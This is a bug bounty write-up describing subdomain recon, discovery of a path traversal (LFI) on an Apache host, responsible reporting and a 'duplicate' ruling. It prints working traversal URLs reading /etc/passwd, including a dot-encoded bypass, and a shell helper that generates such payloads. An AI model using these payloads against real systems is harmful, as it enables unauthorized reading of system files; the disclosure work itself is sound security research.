From Rooted to Rejected: How I Found an LFI… Then Got a “Duplicate” Anyway
Published 2025-12-15 07:45:08 · infosecwriteups.com

By Shah kaif

“If you’re getting dupes, you’re not unlucky — you’re just inches away from payout.”


Overview

In this post, I’ll walk you through how I discovered a Local File Inclusion (LFI) vulnerability on a real-world target, accessed sensitive files like /etc/passwd, reported it responsibly, and even saw it patched within an hour.
Only to be told two days later that it was a duplicate.

Welcome to bug bounty — where you can be right, make impact, and still walk away with zero payout. Here’s how it went down.

Step 1: Recon Like You Mean It

I started with a full passive recon pipeline to identify the maximum attack surface:

amass enum -passive -d target.com -o amass.txt
subfinder -d target.com -o subfinder.txt
sublist3r -d target.com -o sublist3r.txt
assetfinder --subs-only target.com > assetfinder.txt

Combined and cleaned the output:

cat amass.txt subfinder.txt sublist3r.txt assetfinder.txt | sort -u > final_subdomains.txt

Step 2: Finding Live Hosts

To narrow down the scope, I ran:

httpx -l final_subdomains.txt -o live_subdomains.txt

And collected metadata:

httpx -title -td -server -sc -ip -cname -cdn -silent -l live_subdomains.txt -o live_metadata.txt

One subdomain stood out — running Apache, serving some odd static files, and lacking URL sanitization.
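Triage like this can be partly scripted. Here's a minimal sketch (filter_apache is a hypothetical helper, not from the original workflow; live_metadata.txt is the httpx output from above) that keeps only hosts whose metadata line mentions Apache:

```shell
# filter_apache: read httpx metadata lines on stdin and keep only hosts
# whose line mentions Apache (from the -server field), case-insensitively.
filter_apache() {
  grep -i 'apache'
}

# Usage against the metadata gathered above:
#   filter_apache < live_metadata.txt > apache_hosts.txt
```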

Step 3: Manual Fuzzing = Gold

No scanners here: just manual URL tampering and eyes on response codes. I spotted a file download endpoint and started fuzzing:

https://target.com/icons/../../../../../../../../etc/passwd

Then tried an encoded variant:

https://target.com/icons/.%2e%2e/.%2e%2e/.%2e%2e/.%2e%2e/etc/passwd

And boom 💥 — /etc/passwd dumped in plain text.
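Payloads like these can be generated rather than typed by hand. A minimal sketch (build_traversal is a hypothetical helper, not part of the original test) that emits both the plain ../ chain and the dot-encoded variant for a given depth:

```shell
# build_traversal BASE FILE DEPTH
# Prints two traversal URLs: a plain ../ chain and the .%2e%2e/ encoded
# variant used above. BASE, FILE, and DEPTH are illustrative values.
build_traversal() {
  base=$1 file=$2 depth=$3
  plain='' enc='' i=0
  while [ "$i" -lt "$depth" ]; do
    plain="${plain}../"
    enc="${enc}.%2e%2e/"
    i=$((i + 1))
  done
  printf '%s%s%s\n' "$base" "$plain" "$file"
  printf '%s%s%s\n' "$base" "$enc" "$file"
}

# build_traversal 'https://target.com/icons/' 'etc/passwd' 8
```

Dot-encoded traversal under /icons/ is the classic Apache path-normalization bypass shape, which is presumably why this host stood out in the first place.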


Critical impact. Classic LFI. Valid target.


Step 4: Report, Rapid Fix, and Validation

Within an hour of my report, the endpoint was patched.

  • I verified that the LFI was no longer accessible
  • Received acknowledgment from the team
  • Felt good — this looked solid

At this point, I assumed the bug was accepted.
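Re-testing a fix like this is easy to script. A minimal sketch (leaks_passwd is a hypothetical helper; the URL in the usage comment is the payload from Step 3) that checks whether a response body still looks like /etc/passwd:

```shell
# leaks_passwd: read an HTTP response body on stdin; succeed (exit 0)
# if it contains a root entry in /etc/passwd format.
leaks_passwd() {
  grep -q '^root:.*:0:0:'
}

# Re-check after the patch:
#   if curl -s 'https://target.com/icons/../../../../../../../../etc/passwd' | leaks_passwd
#   then echo 'still vulnerable'
#   else echo 'patched'
#   fi
```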


Step 5: Two Days Later…

Out of nowhere — two days later — the final verdict came in:

“This is a duplicate. Another researcher reported this earlier.”

Even though:

  • The bug was still live when I found and reported it
  • It was fixed only after my submission
  • The triage team had acknowledged it as valid first

The duplicate tag still stood.

A Word to Other Hackers

“Just because it’s marked duplicate, doesn’t mean your work was worthless.”

You built the recon chain.
You found the vulnerability.
You wrote the report.
And your report led to the fix.


That’s still a win. It’s validation of your process and skill — and next time, you might just beat the other guy by a minute.

Final Thoughts

Bug bounty isn’t just about payout — it’s about proof of skill, pattern recognition, and timing. This experience reminded me:

  • Recon matters
  • Manual review still wins
  • Timing can be cruel
  • But impact always matters

Even if you get a “duplicate,” remember:

“If you’re getting dupes, you’re not unlucky — you’re just inches away from payout.”

Stay sharp, stay hunting. 🕶️


Source: https://infosecwriteups.com/from-rooted-to-rejected-how-i-found-an-lfi-then-got-a-duplicate-anyway-c353e8088ce4?source=rss----7b722bfd1b8d---4